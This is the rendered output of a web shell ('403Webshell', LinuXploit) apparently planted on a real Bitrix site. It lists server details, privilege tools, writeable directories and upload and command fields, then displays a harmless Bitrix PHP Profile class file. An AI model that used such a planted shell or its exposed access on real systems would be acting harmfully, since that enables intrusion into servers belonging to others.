403Webshell
Server IP : 80.87.202.40  /  Your IP : 216.73.216.169
Web Server : Apache
System : Linux rospirotorg.ru 5.14.0-539.el9.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Dec 5 22:26:13 UTC 2024 x86_64
User : bitrix ( 600)
PHP Version : 8.2.27
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : ON |  Perl : ON |  Python : OFF |  Sudo : ON |  Pkexec : ON
Directory :  /home/bitrix/ext_www/ilovecveti.ru/bitrix/modules/seo/lib/businesssuite/dto/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : /home/bitrix/ext_www/ilovecveti.ru/bitrix/modules/seo/lib/businesssuite/dto/profile.php
<?php

namespace Bitrix\Seo\BusinessSuite\DTO;

class Profile implements \JsonSerializable
{
	private $name;

	private $id;

	private $link;

	private $picture;

	private $type;

	public function setName(?string $name)
	{
		$this->name = $name;
		return $this;
	}

	public function setId(?string $id)
	{
		$this->id = $id;
		return $this;
	}

	public function setLink(?string $link)
	{
		$this->link = $link;
		return $this;
	}

	public function setPicture(?string $picture)
	{
		$this->picture = $picture;
		return $this;
	}

	public function getName()
	{
		return $this->name;
	}

	public function getId()
	{
		return $this->id;
	}

	public function getLink()
	{
		return $this->link;
	}

	public function getPicture()
	{
		return $this->picture;
	}

	public function getType()
	{
		return $this->type;
	}


	public function toArray() : array
	{
		return [];
	}

	/**
	 * @inheritDoc
	 */
	public function jsonSerialize()
	{
		return [
			'id' => $this->id,
			'name' => $this->name,
			'link' => $this->link,
			'picture' => $this->picture,
		];
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit